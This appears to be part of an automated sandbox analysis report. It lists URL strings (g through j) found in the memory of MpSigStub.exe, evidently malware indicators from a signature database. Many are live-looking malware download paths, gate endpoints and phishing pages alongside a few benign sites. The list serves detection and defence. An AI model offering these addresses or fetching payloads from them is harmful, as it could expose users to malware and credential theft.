Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://golden-toto.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/0ma6okopenhttp://goo.gl/0ma6okerror
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/9mrcts
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/bw14po
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/x7a4lcshowwebinpopuptaskkill-f-im
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/ID
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/install.php?time=%d
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6316016526.00000197A4058000.00000004.00000001.sdmp	String found in binary or memory: http://google.ru/js
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd.com
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd2.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://gpt.alarmasystems.ru/wp-content/upgrade/obi.html
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://gracefullifetime.com/yqagtiljgk/530340.png
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://grandsteel.kz/stats.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://granitmdp.com/rechnung-nr-06197/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://grape53.olive.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://greenertrack.info/.well-known/acme-challenge/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://greenthdykegheedahatakankeadeshnaathfgh.ydns.eu/office360/regasm.exe
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://greentreee.com/src/gate.php?a
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://gridinsoft.com/check_ver.php?product=chmeditor&ver=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.bluechipstaffing.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.chromaimagen.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.couturefloor.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.ddoborguild.com/0n1ine.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.dondyablo.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.echowin.com/autorizz0.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.globaltcms.com/autorizz0.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.hamiltoncustomhomesinc.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.llbntv.com/pagament1.exe
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.llbntv.org/pagament1.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://gstat.securitiessupportunit.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://guineapig.tips/co
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://gveejlsffxmfjlswjmfm.com/files/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://gweboffice.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://gx3bxpo.sed.digitalmusictutorials.com
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://gyeuiojndhbvmaoiwnnchauwo28vnj8mjmvnwhk.ydns.eu/document.doc
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://h1m2en.ddns.net/sa98as8f7/kk/1445785485
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://hackbox.f3322.org:808/Consys21.dll
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://handjobheats.com/xgi-bin/q.php
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cn/?src=lm&
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: http://hao.360.cnx
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://happy-fxs.com/sms/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://harpa.space/kgodu.dot
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://hasvideo.net
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://hasvideo.net?t=
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://hellos.tcp4.me/standard-bank-online-relief-funds-ucount-onlinebanking.standardbank.co.za-dire
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://helpefy.com/002/777/new%20outlook/new%20outlook/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://helpservice09.hol.es
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://hem1.passagen.se/fylke/
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://hgastation.com
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://hi.ru/?44
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/orderss182doc.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://highnmightytv.com/wp-content/themes/data.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://hikangaroo5.com/images/xjs7s/gb40f_eygecpdogfzeca1xtg/ruryf1?sxps=vddxqzhm_&oof=xptbdzfnuzvdt
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://hiltrox.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://hit1.marinalvapn.com/silage.zip
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://ho.io/
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://hohosearch.com/?uid=1234#red=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://hollywoodnailspa.net/auth/tb/tb/index.html)
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://hombresvalientesposadas.com/paya/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp	String found in binary or memory: http://hombresvalientesposadas.com/zek/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://home.zh-cn.cc/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://hookbase.com/Index.htm
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://host87.net
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://hostserver.kr
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://hostthenpost.org/uploads/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://hotbar.com
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://hotedeals.co.uk/ekck095032/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://hotelpremier.com.br/imagens/d.doc
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://hpg.se/tmp/lns.txt
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://hqdating.net
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://hqsextube08.com/getsoft/task.php?v=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://html.hjsm.tom.com/?mod=book&act=anonsearch&key=%s
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://htmlcss.3322.org/sub/ray.js
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://http://silver13.net/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://httpz.ru
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://huaned.net/?683228460
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://hvln.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://hyoeyeep.ws/template.doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://hytechmart.com
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.php
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://i.compucrush.com/i.phpxD
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://i.imgur.com/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://i.omeljs.info/omel/javascript.js?appTitle=PennyBee&channel=chkomel
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://i.sfu.edu.ph/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://i.ttd7.cn/getsoft
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://iaa.1eko.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://ianlunn.co.uk
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://ibm.dmcast.com/t.rar
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: http://ibrahimovich.banouta.net/a
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://icloudstorage.moonfruit.com/?preview=y
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://idea-secure-login.com/3/ddg.dll5
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://idmnfs.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://ie.search.psn.cn/
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp	String found in binary or memory: http://iefeadsl.com/feat/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://iframe.ip138.com/ic.asp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://ilogs.forgetmenotbeading.com/images/get.bin%appdata%
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://ilya-popov.ru/wp-content/uploads/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://image.soso.com/image.cgi?w=%s
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://images-saver.pw/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://images.google.cn/images?q=%s
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://images.timekard.com/default.png
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://imd.gdyiping.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://img-save.xyz
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://img.zhongsou.com/i?w=%s
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://imp.fusioninstall.com/impression.do/?event=installer_start&referrer=x
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://imp.mymapsxp.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://imp.theweathercenter.co/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://impemarinestore.com/stub.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://in-t-h-e.cn/show/main.php?r=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://incredicole.com/wp-content/themes/elegant-grunge/images/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://indonesiacyberteam.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://inent17alexe.rr
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://infolokercpns.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://init.crash-analysis.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-analysis.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://init.icloud-diagnostics.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://injectsorals.com/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://inline477.info/fsrv
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://inquiry.space/lucky.doc
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://ins.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://ins.rdxrp.com/stats/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://insf.quickinstallpack.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://insightout-me.com/backup/excellview.php
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://install.outbrowse.com/logTrack.php?x
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://install.xxxtoolbar.com/ist/scripts/prompt.php?
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://installation59.website/my/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://installdream.com/download/blankNet2.dat
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://installer.mediapassplugin.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://installmp3codec.info/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://installs.hotbar.com/installs/hotbar/programs/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://instamailserver.link/finito.ps1
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://instituitartetculture.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://instituthypnos.com/maps1316/ki_d/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://interface.kokmobi.com/newservice
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://interstat.eux
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://investmenteducationkungykmtsdy8agender.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://ios-certificate-update.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://ios-update-whatsapp.com
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://ip.aq138.com/setip.asp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://ippp.co.zw/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://isearch.omiga-plus.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://ismailiyamedical.com/ds/151120.gif
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://istanbulyilbasimekanlari.com/tracking-number-
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://isvbr.net
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://isvbr.net?t=
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://itemprice.kr
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://itsmetees.com/wp-admin/network/doc/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://iy6h86i.sed.tiresnwheels4fun.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://iz.orda.icu/webiz.php
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://izfm.org/data/image/html/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://jL.chura.pl/rc/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://jaculus.ru/902b3449e3e8/interbase/counteract/neat/luxurious/relate/jjibwjhi.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://jaklaw.co/wp-includes/js/plupload/db/view/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://japanesecosplaygirl.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://jast56kl.com/help/index.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://java.sun.com/products/autodl/j2se
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://javascriptobfuscator.com
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://jay6.tech/wp-content/themes/twentynineteen/template-parts/cont
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	String found in binary or memory: http://jetroute.net
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://jiglid.com/ms.xlsx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://jjjjjkl.pe.hu/doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://jmmgroup.ae/213.doc
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://jobylive2.w22.haohaohost.cn/c/abbx/qqpost.asp
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://joelosteel.gdn/pi.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://josephioseph.com/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://joxi.ru/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://js.f4321y.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://js.mykings.pw:280/v.sctscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://js.mys2018.xyz:280/v.sct
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://js.pkglayer.com
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://js.pkglayer.comx
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://jugnitv.com/final.jpg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_100?clientuin=
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://jump.qq.com/clienturl_15
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://juntec.es/rechnung-18561/
